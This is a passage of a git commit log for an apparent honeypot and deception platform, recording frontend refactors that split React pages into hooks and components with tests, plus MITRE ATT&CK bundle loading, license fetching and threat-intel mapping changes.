behaviour_panel test moves to behaviour/BehaviouralPrimitivesPanel.test.tsx
and now imports from the canonical location. The shell still
re-exports BehaviouralPrimitivesPanel for source compatibility.
2026-05-09 06:25:53 -04:00
1f3f58c42c refactor(decnet_web/AttackerDetail): lift fingerprint renderers + tests
Move 12 Fp* components, FingerprintGroup, getPayload, seqClassColor,
HashRow, fpType lookups, and UA color tables into
AttackerDetail/fingerprints/. AttackerDetail.tsx drops from 1652
to 1220 LOC; the orchestrator now imports the same helpers it used
to define inline. 10 new tests covering UA / HTTP-quirks / resumption
/ certificate / spoofed-source / TCP-stack / dispatch fallback.
2026-05-09 06:21:44 -04:00
d25f69ba1b feat(ttp): extract intel_lifter provider mappings to YAML data + ATT&CK external_reference enrichment
The four provider→technique tables (AbuseIPDB cat→techniques,
GreyNoise tag→techniques, ThreatFox threat_type→techniques, plus
the Feodo binary-listed signal) used to live as Final[dict] constants
in intel_lifter.py. Two real problems with that:

1. Drift between rules/ttp/R0054.yaml..R0058.yaml (which declare
   the full slate per provider) and the Python dicts (which decide
   which slate-member fires per signal). The v2 audit comment in
   intel_lifter.py documented that they had silently drifted.
2. No ATT&CK provenance on emissions — the loaded STIX bundle has
   rich external_references (canonical attack.mitre.org URLs) that
   never surfaced because the lifter had no path back to them.

Mappings now live as YAML at decnet/ttp/data/intel/{provider}.yaml,
validated at load against the loaded ATT&CK bundle, with each entry
enriched by attack_stix._attack_pattern_by_id to attach the canonical
MITRE URL to every emission.

- decnet/ttp/data/intel_loader.py: pydantic-validated schema +
  ProviderMapping/Signal/TechniqueEmission frozen dataclasses +
  load_provider_mapping(provider) lru-cached.
- Per-technique high_score_threshold inlined into YAML
  (collapses the separate _ABUSEIPDB_HIGH_SCORE_GATED dict).
- external_reference field follows the STIX 2.1 external-reference
  shape (source_name + url + optional external_id) so the future
  STIX/MISP exporter is a direct translation.
- intel_lifter.py: dicts deleted, decision functions read from
  ProviderMapping accessors. Decision-flow constants (T1071/T1595
  bare-classification fallbacks in _greynoise_decisions) stay in
  code — they're not table rows.
- Each emit slot's evidence_extra now carries mitre_url for any
  technique resolved in the bundle (every one in practice).
- tests/ttp/test_intel_mappings.py: snapshot equivalence vs the
  legacy dicts, high-score gate behavior, every-signal-has-an-
  external-reference, every-emission-has-a-mitre-url, negative
  paths (unknown technique_id raises AttackBundleError, mismatched
  provider field rejected, dir listing matches expected providers).

The YAML schema + mitre_url enrichment lays groundwork for the
future STIX exporter; this commit does NOT build that exporter.
2026-05-09 06:18:25 -04:00
a3f1cea2d6 feat(ttp): fetch + verify MITRE ATT&CK LICENSE alongside the bundle
MITRE's ATT&CK Terms of Use require reproducing their copyright +
license alongside any cached copy of ATT&CK data. Today we ship the
bundle but not the license — this commit closes that compliance gap.

- attack_version.py pins ATTACK_LICENSE_URL +
  ATTACK_LICENSE_SHA256 + ATTACK_LICENSE_FILENAME, sourced from the
  same attack-stix-data repo as the bundle.
- attack_stix.py:_fetch_license downloads LICENSE.txt next to the
  bundle. License sha mismatch is logged + refreshed (license text
  gets occasional formatting tweaks; not a security event), unlike
  the bundle which stays fail-closed.
- _ensure_license is the compliance ratchet: resolve_bundle_path
  refuses to return without LICENSE.txt on disk. Override-mode
  (DECNET_ATTACK_BUNDLE) checks for a sibling LICENSE.txt first,
  then DECNET_ATTACK_LICENSE, then the cache dir.
- python -m decnet.ttp.attack_stix license prints the cached license
  to stdout for operator audit.
- loaded_license_path() exposes the active license path read-only.
- tests/ttp/test_attack_license.py covers happy paths (sibling +
  explicit env), refusal when DECNET_ATTACK_LICENSE points at a
  missing file, the CLI subcommand, and the pinned-sha shape.
2026-05-09 06:17:46 -04:00
b326d70852 refactor(decnet_web/Credentials): wire shell + bump coverage floor
Credentials.tsx: 487 -> 231 LOC. Page now composes CredsTable +
ReuseTable + useCredentials hook; URL-derived state (tab, query,
service, page) and selection/sort UI are the only concerns left
in the shell.
2026-05-09 06:12:58 -04:00
bf79581cc9 refactor(decnet_web/Credentials): extract CredsTable + ReuseTable + SortTh 2026-05-09 06:11:38 -04:00
e29a0094c9 refactor(decnet_web/Credentials): add useCredentials data hook 2026-05-09 06:10:53 -04:00
275fac5288 refactor(decnet_web/Credentials): extract types + helpers with tests 2026-05-09 06:09:57 -04:00
2c1ccec8fa refactor(decnet_web/SwarmHosts): wire shell + bump coverage floor
SwarmHosts.tsx: 513 -> 161 LOC. Page now composes EnrollmentWizard
+ useSwarmHosts hook; only the arm/confirm UI affordance and the
busy-set tracking remain in the shell.
2026-05-09 06:08:48 -04:00
780d395a46 refactor(decnet_web/SwarmHosts): add useSwarmHosts polled data hook 2026-05-09 06:07:38 -04:00
9def7fd22f refactor(decnet_web/SwarmHosts): extract EnrollmentWizard 2026-05-09 06:06:29 -04:00
3a8519b2a1 refactor(decnet_web/SwarmHosts): extract types + helpers with tests 2026-05-09 06:05:19 -04:00
31f4c54c32 refactor(decnet_web/Webhooks): wire shell + bump coverage floor
Webhooks.tsx: 642 -> 387 LOC. Page now composes FormRow + SecretModal
+ useWebhooks hook; toast policy is the only UI concern left in the
shell. Multi-select delete uses the hook's reload internally.
2026-05-09 06:04:14 -04:00
7408a04a90 refactor(decnet_web/Webhooks): add useWebhooks data hook 2026-05-09 06:02:37 -04:00
1ac64d2ae2 refactor(decnet_web/Webhooks): extract FormRow + SecretModal 2026-05-09 06:01:47 -04:00
432057f44a feat(ttp): fail-closed validation that lifter+UKC IDs resolve in ATT&CK bundle
Drift between the technique/tactic IDs hardcoded in the lifters and
what the loaded ATT&CK STIX bundle actually contains is silent in the
status quo: a renamed-or-retired technique just stops being tagged.
Every emission point now has an explicit validator that asserts its
IDs resolve in the loaded bundle, called once at TTP-worker boot.

- intel_lifter.all_emitted_technique_ids() collects every technique
  the four provider tables (AbuseIPDB / GreyNoise / Feodo / ThreatFox)
  plus the decision-flow constants in _greynoise_decisions and
  _feodo_decisions can emit. validate_against_attack_bundle() runs it
  through attack_stix.assert_known_technique_ids().
- ukc.validate_against_attack_bundle() asserts every key in
  ATTACK_TACTIC_TO_UKC resolves, with TA0100..TA0106 documented as
  _NON_ENTERPRISE_TACTICS (lives in the ICS bundle, not the
  enterprise bundle DECNET loads).
- decnet/ttp/worker.py:run_ttp_worker_loop calls both validators
  before subscribing to the bus. A bundle-vs-code mismatch refuses
  to start the worker rather than silently mistagging events.
- tests/ttp/test_attack_bundle_validation.py covers the happy path
  for both validators, the negative path (injected bogus tactic ID
  raises AttackBundleError), the ICS exemption, and the lone T1078
  reference in credential_lifter.
2026-05-09 05:58:06 -04:00
d743d38cac feat(ttp): load MITRE ATT&CK from official STIX 2.1 bundle
Replace the hand-maintained TECHNIQUE_NAMES dict (pinned to v15.1) with
a runtime loader that reads the official enterprise-attack-N.json STIX
bundle. Version bumps now require only updating attack_version.py;
sub-technique parents, tactic IDs, and kill-chain phases all come from
MITRE's published data.

- decnet/ttp/attack_version.py pins version 19.0 + sha256 + URL
- decnet/ttp/attack_stix.py is the lazy STIX loader. Resolution order:
  DECNET_ATTACK_BUNDLE env -> ~/.cache/decnet/attack/ -> fetch from
  the pinned MITRE GitHub URL. SHA-256 verified before parse;
  mismatch fails closed.
- decnet/ttp/attack_catalog.py collapses to a shim re-exporting
  technique_name() so the ~9 router/repo call sites don't churn.
- python -m decnet.ttp.attack_stix fetch warms the cache and can
  print sha256 for version-bump workflows.
- test_attack_catalog.py now asserts every rule-emitted ID resolves
  in the loaded bundle (same contract, real source) and exercises
  the SHA-256-mismatch fail-closed path.
2026-05-09 05:54:36 -04:00
44f4dd8c85 refactor(decnet_web/Webhooks): extract types + helpers with tests 2026-05-09 05:49:34 -04:00
ac64329a13 refactor(decnet_web/PersonaGeneration): wire shell + bump coverage floor
PersonaGeneration.tsx: 875 -> 357 LOC. Page now composes the data
hook + PersonaCard + PersonaEditor; bulk-import helpers stay in
helpers.ts; toast policy is the only UI concern left in the shell.
2026-05-09 05:48:16 -04:00
c1a65bf9a3 refactor(decnet_web/PersonaGeneration): add usePersonaGeneration data hook 2026-05-09 05:46:08 -04:00
97e72d975b refactor(decnet_web/PersonaGeneration): extract PersonaCard + PersonaEditor 2026-05-09 05:45:10 -04:00
a19d8bba17 refactor(decnet_web/PersonaGeneration): extract types + helpers with tests 2026-05-09 05:43:59 -04:00
6e0e1c204e refactor(decnet_web/MazeNET): wire hooks + bump coverage floor
Final integration step. The MazeNET page shell is now a thinner
composition of the existing module-level hooks (useMazeApi,
useMazeInteraction, useTopologyEditor, useTopologyStream,
useLayoutPersistor) PLUS the three new ones from this phase
(useFullscreenMode, useTopologyData, useMazeContextMenu).

- MazeNET.tsx: 980 -> 715 LOC. The fullscreen + body-class
  effects, the topology hydrate / SSE stream / deploy /
  flashErr plumbing, and the four context-menu builders are
  all gone from the shell.
- Page still owns the per-operation editor callbacks
  (removeNet/Node/Edge, duplicateNode, addServiceToNode, etc.)
  because they need direct access to setNodes/setEdges/setNets
  for optimistic patches alongside their REST calls — those
  setters are exposed by useTopologyData for that reason.

Coverage floor bumped after the phase:

  lines       17 -> 19
  functions   15 -> 17
  branches    13 -> 14
  statements  16 -> 18

Phase 5 final scoreboard: 37 test files, 172 tests, all green.
2026-05-09 05:39:32 -04:00
f33a011900 refactor(decnet_web/MazeNET): extract useMazeContextMenu
Lift the context-menu builder out of the page shell. The hook
owns ctxMenu open/close state and exposes one builder per
surface (node / net / edge / canvas); the actual operations come
in via callbacks so the page keeps its optimistic-patch logic
unchanged.

- New MazeNET/useMazeContextMenu.tsx
- useMazeContextMenu.test.ts covers menu lifecycle (open/close),
  node-menu items, observed-entity locking, internet-net
  delete-disabled, canvas-menu Add subnet/DMZ items, and the
  edge-menu Remove invocation.
- Wiring into MazeNET.tsx lands next.
2026-05-09 05:34:58 -04:00
5f2a3f4629 refactor(decnet_web/MazeNET): extract useTopologyData
Lift the canvas data plane off the page shell. The hook owns:

  GET /topologies/:id            (hydrates nets/nodes/edges + meta)
  GET services + archetypes      (catalogs, with bundled fallback)
  POST /topologies/:id/deploy
  /topologies/:id/events SSE     (open only when active/degraded)
  flashErr() banner timer        (auto-clears actionErr after 4s)

State setters for nets / nodes / edges are returned so the
per-operation callbacks living in the page can optimistically
patch local state alongside their REST calls (matches the
existing pattern; wholesale lift would mean dragging every
mutation along too).

- New MazeNET/useTopologyData.ts
- useTopologyData.test.ts covers hydrate, loadErr surfacing,
  streamEnabled gating on active/degraded, onDeploy success +
  error paths, and the flashErr 4s auto-clear with fake timers.
- Wiring into MazeNET.tsx lands in the next commit.
2026-05-09 05:33:19 -04:00
212feb49e2 refactor(decnet_web/MazeNET): extract useFullscreenMode
Lift the four fullscreen-related side-effects off the page shell.
The hook owns:

  1. body class toggle so page CSS can hide its chrome
  2. browser fullscreen API request/exit (failures ignored)
  3. fullscreenchange listener so F11/Esc from outside our button
     keeps internal state in sync
  4. Esc keystroke handler

Returns { fullscreen, setFullscreen, toggle }.

- New MazeNET/useFullscreenMode.ts
- useFullscreenMode.test.ts (jsdom) covers initial toggle, body
  class lifecycle, Esc-to-exit, and unmount cleanup.
- MazeNET.tsx loses ~30 LOC of inline state + effects.
2026-05-09 05:31:39 -04:00
171e20e427 refactor(decnet_web/Config): wire hook + bump coverage floor
Final integration. The page shell is now a thin composition of
useConfig + the previously-extracted children:

- Config.tsx: 989 -> 131 LOC. Page owns only the activeTab state
  (and the "drop the users tab if the server didn't send users"
  effect). Every form lives inside its tab; toast wiring lives
  in AppearanceTab; window.alert calls live inside UsersTab.
- Tabs receive their `onSave* / onAddUser / ...` callbacks
  directly from the hook — no intermediate wrapper handlers.

Coverage floor bumped after the split:

  lines       14 -> 17
  functions   13 -> 15
  branches    11 -> 13
  statements  13 -> 16

Phase 4 final scoreboard: 34 test files, 156 tests, all green.
2026-05-09 05:27:47 -04:00
4a9cd90f90 refactor(decnet_web/Config): extract AppearanceTab
APPEARANCE panel — accent-color picker — into its own tab. State
is local since no other tab cares about the value; localStorage
persistence + the document.documentElement[data-accent] mirror
move along with it.

- New Config/tabs/AppearanceTab.tsx
- AppearanceTab.test.tsx covers the matrix default, reading the
  saved accent from localStorage on mount, and the click-to-flip
  flow writing both localStorage and the html data-accent attr.
2026-05-09 05:26:26 -04:00
ccae1612bd refactor(decnet_web/Config): extract GlobalsTab + DangerZone
GLOBAL VALUES panel + the developer-mode-gated DANGER ZONE
(reinit) into one tab file. Two stacked panels because they're
the two pieces of UX you ever see together on the globals tab;
splitting them into separate components would force the page
shell to re-pick the gating predicate.

- New Config/tabs/GlobalsTab.tsx (mutation-interval + DangerZone
  inline, since DangerZone is reinit-specific and won't be reused)
- GlobalsTab.test.tsx covers interval-format validation, the
  DANGER ZONE gating on developer_mode, the two-step reinit
  confirm flow, the totals chip ("PURGED: N logs, N bounties,
  N attacker profiles") on success, and viewer-mode rendering.
2026-05-09 05:25:49 -04:00
be35228191 refactor(decnet_web/Config): extract UsersTab
USER MANAGEMENT panel into its own tab. Owns the per-row UI
state (delete-confirm, reset-password popup) plus the add-user
form state; mutations come in via prop. Errors on per-row
operations stay on window.alert (matches existing behavior); the
add form uses the inline FormMsg chip.

- New Config/tabs/UsersTab.tsx
- UsersTab.test.tsx covers row rendering with the must-change
  badge, the two-step delete confirm flow, the add-user submit
  payload (trimmed username + selected role), and the success
  chip after a successful add.
2026-05-09 05:24:55 -04:00
8807da218b refactor(decnet_web/Config): extract LimitsTab
DEPLOYMENT LIMITS panel into its own tab file. Owns the input
state, preset-button shortcuts, and the inline FormMsg chip; the
hook mutation is passed in via prop so this component is fully
reusable as a presentation-only piece.

- New Config/tabs/LimitsTab.tsx
- LimitsTab.test.tsx covers viewer-vs-admin rendering, the
  1-500 validation message, and success/error chip display.
2026-05-09 05:23:42 -04:00
f2fd314dd6 refactor(decnet_web/Config): extract useConfig data hook
Lift the GET /config fetch and every admin-side mutation off the
page shell:

  GET    /config
  PUT    /config/deployment-limit
  PUT    /config/global-mutation-interval
  POST   /config/users
  DELETE /config/users/:uuid
  PUT    /config/users/:uuid/role
  PUT    /config/users/:uuid/reset-password
  DELETE /config/reinit (returns { logs, bounties, attackers })

Mutations return { ok: true } | { ok: false; reason: string } so
the upcoming tab components can render the inline FormMsg chip
without touching axios error shapes. reinit additionally returns
the deletion totals so the danger-zone confirmation can echo
"PURGED: N logs, N bounties, N attackers".

- New Config/useConfig.ts
- useConfig.test.ts MSW-covers initial load, isAdmin role
  surfacing, setDeploymentLimit ok + 400 paths, addUser, deleteUser
  refused, and reinit success.
- Wiring into Config.tsx + tab extractions land in follow-up commits.
2026-05-09 05:23:04 -04:00
b1fbf4630e refactor(decnet_web/Config): move WorkersPanel out
Verbatim move of the worker-status pollster (~390 LOC) plus its
RealismBadge sidekick into its own file. Owns its own polling +
stop/start/start-all mutations; toast push comes in via prop so
the parent stays the one source of toast tone.

- New Config/WorkersPanel.tsx
- WorkersPanel.test.tsx (MSW) covers worker-row rendering, the
  BUS OFFLINE banner, and the error panel on /workers 500.
- Config.tsx loses the inline WorkersPanel + RealismBadge plus
  the now-unused icon imports (Square, RefreshCw, Play).
2026-05-09 05:22:10 -04:00
209efd1a74 refactor(decnet_web/Config): extract types
Foundation for the Config split. UserEntry / ConfigData move out
of the page so the upcoming hook + tab extractions can import
without reaching back through Config.tsx. New ConfigTab union and
FormMsg type for the inline success/error chip pattern that
repeats across every admin form on the page.

- New Config/types.ts (UserEntry, ConfigData, ConfigTab, FormMsg)
- Config.tsx loses the inline interfaces and the `as any` cast on
  setActiveTab in the tab-switcher.
2026-05-09 05:19:50 -04:00
6ba12cc571 refactor(decnet_web/CanaryTokens): wire hook + bump coverage floor
Final integration step. The page shell is now a thin composition
of useCanaryTokens + the previously-extracted children:

- CanaryTokens.tsx: 1,334 -> 210 LOC. Page owns only the
  pure-UI state (tab, search/state/scope filters, modal
  visibility, drawer selection, local fileDrops log) and the
  thin handlers that translate hook results into confirm/alert
  prompts. Initial parallel fetch + deleteBlob mutation moved
  to useCanaryTokens in the prior commit.
- Modals plug directly into the hook's optimistic helpers
  (prependToken / prependBlob / markTokenRevoked) so the page
  doesn't reach into the data shape.

Coverage floor bumped after the split:

  lines       11 -> 14
  functions   10 -> 13
  branches     8 -> 11
  statements  11 -> 13

Phase 3 final scoreboard: 28 test files, 131 tests, all green.
2026-05-09 05:17:52 -04:00
c5cbe084cb refactor(decnet_web/CanaryTokens): extract list views
Lift the three tab bodies — tokens, blobs, file drops — into
their own files. Each takes plain props (data + the operations
its rows need), so the page shell stops mixing tab markup with
data plumbing.

- New CanaryTokens/TokenListView.tsx (text search + state/scope
  filter selectors + flat row grid; visibleTokens memo lives here
  now). Exports StateFilter / ScopeFilter union types so the page
  can declare its filter useState with the right shape.
- New CanaryTokens/BlobListView.tsx (delete refused while a token
  references a blob; ref count badge reuses the disabled button).
- New CanaryTokens/FileDropListView.tsx (CLEAR LIST hidden when
  the local log is empty).
- Three companion tests cover empty states, filter behavior,
  delete refused-vs-allowed, and the per-tab callback wiring.

Wiring into CanaryTokens.tsx + the hook lands next.
2026-05-09 05:16:18 -04:00
0c8c74a89d refactor(decnet_web/CanaryTokens): extract useCanaryTokens hook
Lift the parallel initial-load fetch and the deleteBlob mutation
off the page shell. Modal-driven optimistic merges (created
token, uploaded blob, drawer-revoked token) flow through narrow
setter helpers so the modals don't have to know how state is
shaped internally.

  GET    /canary/tokens
  GET    /canary/blobs (silent 403 -> empty list, viewer-friendly)
  GET    /deckies
  GET    /topologies/?status=active
  DELETE /canary/blobs/:uuid

deleteBlob returns { ok, reason } so the page can branch the
toast/alert tone without seeing the axios error type. Wiring
into CanaryTokens.tsx lands in the next commit.

- New CanaryTokens/useCanaryTokens.ts
- useCanaryTokens.test.ts MSW-covers happy load, viewer 403 ->
  empty blobs, deleteBlob ok + refused-with-detail paths, and the
  markTokenRevoked optimistic write.
2026-05-09 05:14:48 -04:00
69f547f75e refactor(decnet_web/CanaryTokens): move FileDropModal + LS helpers
Verbatim move of the file-drop modal (~310 LOC) and its
localStorage glue (FILEDROP_LS_KEY, FileDropEntry type,
loadFileDrops, saveFileDrops) into one file. The list view that
shows these entries lives in the page; the persistence layer
travels with the writer.

- New CanaryTokens/FileDropModal.tsx (modal + LS helpers + entry type)
- FileDropModal.test.tsx covers loadFileDrops empty / round-trip /
  200-row cap / malformed-JSON, plus modal title rendering, the
  bypass-warning banner, and CANCEL -> onClose.
- CanaryTokens.tsx loses the inline modal + LS glue plus the
  now-unused imports (useRef/X/AlertTriangle/useEscapeKey/
  useFocusTrap, plus BTN_PRIMARY/BTN_GHOST/Field that only the
  modals consumed).
2026-05-09 05:13:51 -04:00
b664655dcb refactor(decnet_web/CanaryTokens): move UploadModal out
Verbatim move of the artifact upload modal (~130 LOC) into its
own file. Drop-or-browse picker, server-side-injection warning
banner, and the multipart POST stay unchanged.

- New CanaryTokens/UploadModal.tsx
- UploadModal.test.tsx covers title rendering, empty drop-zone
  hint, server-injection warning banner, UPLOAD-disabled-until-
  file, and CANCEL -> onClose.
2026-05-09 05:11:46 -04:00
e30455551d refactor(decnet_web/CanaryTokens): move CreateTokenModal out
Verbatim move of the canary-token creation modal (~280 LOC) into
its own file. Renamed from CreateModal to CreateTokenModal so the
component name carries scope across the package boundary.

- New CanaryTokens/CreateTokenModal.tsx
- CreateTokenModal.test.tsx covers title rendering, CANCEL ->
  onClose, empty-deckies hint, and the Operator-upload mode
  switch revealing the no-blobs message. useFocusTrap is
  vi.mock'd to avoid jsdom focus shenanigans.
- CanaryTokens.tsx loses the inline modal + its now-unused
  imports (KNOWN_GENERATORS, KIND_OPTIONS, GeneratorName).
2026-05-09 05:10:27 -04:00
a35048b174 refactor(decnet_web/CanaryTokens): extract types + helpers + ui
Foundation for the CanaryTokens split. Types, error/format helpers,
and the inline style + small primitives move out of the page so
the upcoming modal/list extractions can import without reaching
back through CanaryTokens.tsx.

- New CanaryTokens/types.ts (BlobRow, DeckyOption, TopologyOption,
  Scope, KNOWN_GENERATORS / GeneratorName, KIND_OPTIONS, STATE_COLOR)
- New CanaryTokens/helpers.ts (extractError, fmt, fmtBytes)
- New CanaryTokens/ui.tsx (INPUT_STYLE, BTN_PRIMARY, BTN_GHOST,
  Field, Stat)
- CanaryTokens.tsx loses ~110 LOC of inline definitions; behavior
  unchanged.
2026-05-09 05:08:37 -04:00
08c274486e test(decnet_web): raise coverage floor after DeckyFleet split
Phase 2 lands. DeckyFleet.tsx dropped from 1,674 to 274 LOC; the
fleet page is now a thin composition of useDeckyFleet + 6
extracted children (DeckyInspectPanel, IntervalEditor, DeckyCard,
DeployWizard, DeckyFilters, DeckyGridEmpty), each with co-located
tests.

Lock the gain by bumping the threshold floor in vite.config.ts:

  lines       7  -> 11
  functions   6  -> 10
  branches    5  -> 8
  statements  7  -> 11

Phase 2 final scoreboard: 21 test files, 98 tests, all green.
2026-05-09 05:06:08 -04:00
9da6f6983e refactor(decnet_web/DeckyFleet): wire hook + extract filter UI
Final integration step. The page shell is now a thin composition
of the hook + the previously-extracted children:

- DeckyFleet.tsx: 1,674 -> 274 LOC. Page owns only the
  pure-UI state (filter, search, armed-confirm, modal visibility,
  selected-card-for-inspect) and the toast-wrapping handlers that
  translate hook results into toast tone. Polling, REST plumbing,
  role lookup, and archetype catalog all moved to useDeckyFleet
  in the prior commit.
- New DeckyFilters.tsx (header pill row + DEPLOY shortcut) +
  DeckyGridEmpty.tsx (fleet-empty vs. filter-empty copy).
- DeckyFilters.test.tsx + DeckyGridEmpty.test.tsx cover count
  rendering, filter-click callbacks, and admin-gated DEPLOY
  visibility.

Two-step teardown arming logic stays in the page (it's pure UI).
Toast tone branching on { ok, reason } from useDeckyFleet
results moves the policy decision out of the data layer.
2026-05-09 05:05:31 -04:00
9ddeb1a08c refactor(decnet_web/DeckyFleet): extract useDeckyFleet data hook
Lift every read- and write-side data flow off the page shell:

  GET  /system/deployment-mode  (decides which list endpoint to hit)
  GET  /deckies | /swarm/deckies (mode-switched + shape-normalized)
  GET  /config (role -> isAdmin)
  GET  /topologies/archetypes (live catalog with bundled fallback)
  POST /deckies/:name/mutate
  PUT  /deckies/:name/mutate-interval
  POST /swarm/hosts/:uuid/teardown
  10s polling loop refreshing mode + list

Operations return discriminated results ({ok:true} | {ok:false,
reason:...}) so the page can branch toast tone without seeing the
axios error type. Toasts, arm-confirm, and modal visibility stay
in the consuming page — the hook is pure data.

- New DeckyFleet/useDeckyFleet.ts
- useDeckyFleet.test.ts MSW-covers initial load, swarm-mode shape
  normalization, mutate ok/error paths, teardown ok path, and
  applyServicesChange optimistic write.
- DeckyFleet.tsx wiring lands in the next commit so the diff stays
  reviewable.
2026-05-09 05:03:31 -04:00
1e2bc41ab1 refactor(decnet_web/DeckyFleet): move DeployWizard out
Lift the multi-step deploy wizard (~520 LOC) plus its private
INI-builder helpers (PLACEHOLDER_LINES, b64encodeUtf8, buildIni,
PickMode type) into their own file. Verbatim move; the
underscore-prefixed helpers drop the leading underscore now that
they're file-local rather than competing with hoisted parent
constants.

- New DeckyFleet/DeployWizard.tsx
- DeployWizard.test.tsx covers the closed render guard, the
  open-at-step-0 archetype list, NEXT-disabled-until-archetype,
  and CANCEL -> onClose. ServiceConfigFields is vi.mock'd to a
  stub since it pulls schemas via api.get() that are out of
  scope for these tests.
- DeckyFleet.tsx loses the wizard plus the now-unused imports
  (DEFAULT_SERVICES, Modal, PickIcon, ServiceConfigFields and
  its type aliases).
2026-05-09 05:01:33 -04:00
849caffaf1 refactor(decnet_web/DeckyFleet): move DeckyCard out
Lift the per-decky tile (~430 LOC) into its own file. Tarpit
controls, live add/remove service flow, and the per-service config
toggle stay inside the card — those are tile-local UI concerns and
only ever rendered from this component anyway.

- New DeckyFleet/DeckyCard.tsx
- DeckyCard.test.tsx covers identity row + services rendering,
  admin-gated FORCE MUTATE visibility, the FORCE MUTATE callback,
  TEARDOWN -> CONFIRM toggle when armed matches, and card-body
  click firing onInspect. AddServiceConfigModal +
  ServiceConfigForm are vi.mock'd so we don't need MSW handlers
  for their unrelated network fetches.
- DeckyFleet.tsx loses the inline component plus the now-unused
  imports it dragged in (Network/PowerOff/RefreshCw/Plus/X icons,
  ServiceConfigForm, AddServiceConfigModal, useCallback).
2026-05-09 04:58:25 -04:00
b6ff288dcf refactor(decnet_web/DeckyFleet): move IntervalEditor out
Verbatim move of the per-decky mutation-interval modal (~60 LOC)
into its own file. Saves null when the toggle is off, minutes
otherwise.

- New DeckyFleet/IntervalEditor.tsx
- IntervalEditor.test.tsx covers null-current disabled path,
  numeric-current enabled path, and CANCEL not firing onSave.
- src/test/fixtures/decky.ts now derives DeckyFixture from the
  canonical Decky type (the fixture's loose swarm shape was
  missing host_address/host_status; aligning to Decky catches
  that statically).
2026-05-09 04:55:30 -04:00
032ffbb4eb refactor(decnet_web/DeckyFleet): move DeckyInspectPanel out
Lift the right-side inspect drawer (~115 LOC) into its own file.
This is a verbatim move — same JSX, same useEscapeKey + body
overflow lock, same swarm-section gating. Underscore-prefixed
helper calls (_dotFor, _stateColor) drop the leading underscore
since they're now imported from helpers.tsx.

- New DeckyFleet/DeckyInspectPanel.tsx
- DeckyInspectPanel.test.tsx covers identity-row rendering, the
  SERVICES chip list, the conditional SWARM block, and the close
  button callback.
- DeckyFleet.tsx loses the panel + the now-unused useEscapeKey
  import.
2026-05-09 04:54:10 -04:00
8c168c64a8 refactor(decnet_web/DeckyFleet): extract types + helpers
Foundation for the DeckyFleet split. Types and helpers move to
their own files so the upcoming subcomponent extractions can
import without reaching back through the parent module.

- New DeckyFleet/types.ts (Decky, SwarmDeckyRaw, SwarmMeta,
  Archetype, FilterKey, DeckyStatus). Names exported to match the
  pattern set by AttackerDetail/types.ts.
- New DeckyFleet/helpers.tsx (archetypeIcon, PickIcon, dotFor,
  hitsFor, stateColor). Underscore-prefixed call sites stay via
  import-rename so this commit changes zero behavior.
- DeckyFleet.tsx loses ~110 LOC of inline definitions plus the
  now-unused icon imports (Cpu / Database / Globe / Monitor /
  Shield / Terminal).
2026-05-09 04:52:48 -04:00
6d7c0b6419 test(decnet_web): raise coverage floor after AttackerDetail split
Phase 1 of the UI refactor is in. AttackerDetail dropped from
2,579 LOC inline data + JSX to a 408-LOC shell composed of
extracted sections, each with co-located tests. Lock the gain by
bumping the threshold floor in vite.config.ts:

  lines       0 -> 7
  functions   0 -> 6
  branches    0 -> 5
  statements  0 -> 7

Future PRs raise these; never lower. Phase 1 final scoreboard:
9 test files, 45 tests, all green.
2026-05-09 04:49:32 -04:00
d5efebd73d refactor(decnet_web/AttackerDetail): extract MailLogPanel section
Lift STORED MAIL into its own section and pull the mail drawer
selection state along with it. Section signals admin-gating
through the section's own props (mailForbidden), since the data
hook already converts a 403 into that boolean.

- New AttackerDetail/sections/MailLogPanel.tsx
- MailLogPanel.test.tsx covers row rendering, mailForbidden empty
  state, no-mail empty state, from_hdr/from_addr/mail_from
  fallback, and drawer open/close. MailDrawer vi.mock'd same as
  ArtifactDrawer.
- AttackerDetail.tsx loses the mail JSX block, mailItem state,
  and now-unused Mail/MailDrawer imports.
2026-05-09 04:48:44 -04:00
14713eb294 refactor(decnet_web/AttackerDetail): extract ArtifactsPanel section
Lift CAPTURED ARTIFACTS into its own section, taking the drawer
selection state with it (the parent shell no longer owns
artifact-modal state).

- New AttackerDetail/sections/ArtifactsPanel.tsx
  Drawer is rendered as a sibling of the section so its z-index
  and focus-trap behavior mirror the original.
- ArtifactsPanel.test.tsx covers row rendering with parsed SD
  fields, empty state, missing stored_as (no OPEN button), and
  the open/close cycle. ArtifactDrawer is vi.mock'd to a stub
  so we don't need MSW handlers for its content fetch.
- AttackerDetail.tsx loses the artifact JSX block, the artifact
  state, and now-unused Paperclip/Package/ArtifactDrawer imports.
2026-05-09 04:47:17 -04:00
9cee4b2e71 refactor(decnet_web/AttackerDetail): extract CommandsViewer section
Lift the COMMANDS collapsible — paginated table with header-bar
prev/next controls — into its own section. The page math
(cmdTotalPages = ceil(total/limit)) and conditional empty state
both live in the section now.

- New AttackerDetail/sections/CommandsViewer.tsx
- CommandsViewer.test.tsx covers title formatting (unfiltered vs.
  filtered), empty state, single-page pagination hiding, and
  prev/next button behavior
- AttackerDetail.tsx loses the IIFE-wrapped commands JSX block
  plus now-unused ChevronLeft/ChevronRight/Terminal imports
2026-05-09 04:45:41 -04:00
7b21f31078 refactor(decnet_web/AttackerDetail): extract ServicesTargeted section
Lift the SERVICES TARGETED collapsible — interactive two-tone badge
chips with click-to-filter — into its own section. The selection
state was already lifted into useAttackerDetail in the prior
commits, so the section just consumes serviceFilter /
setServiceFilter as props.

- New AttackerDetail/sections/ServicesTargeted.tsx
- ServicesTargeted.test.tsx covers badge rendering, empty state,
  inactive-click-sets-filter, and active-click-clears-filter
- AttackerFixture grows ip_leaks/ip_leaks_total fields so the
  TimelineSection rotation test (added in the prior commit) keeps
  passing under the new factory shape
2026-05-09 04:44:25 -04:00
95e1a4ab7a refactor(decnet_web/AttackerDetail): extract TimelineSection
Lift the TIMELINE collapsible (timestamps, ASN, reverse DNS,
leaked-IPs row with rotation detection) into its own section.
LeakedIPsRow + the rotation/inline-limit constants come along
since they were only ever used here.

Also moves the shared `Section` collapsible primitive into
AttackerDetail/ui.tsx so the remaining sections can adopt the
template without re-importing through the parent module.

- New AttackerDetail/sections/TimelineSection.tsx (LeakedIPsRow
  inline as a private helper)
- AttackerDetail/ui.tsx now exports both Tag and Section
- AttackerDetail.tsx loses LeakedIPsRow, the Section helper, the
  Timeline JSX block, and now-unused imports (ChevronUp, ChevronDown,
  AttackerData)
- TimelineSection.test.tsx covers timestamps, unknown-origin path,
  rotation badge, empty leaks, collapse, and toggle callback
2026-05-09 04:43:13 -04:00
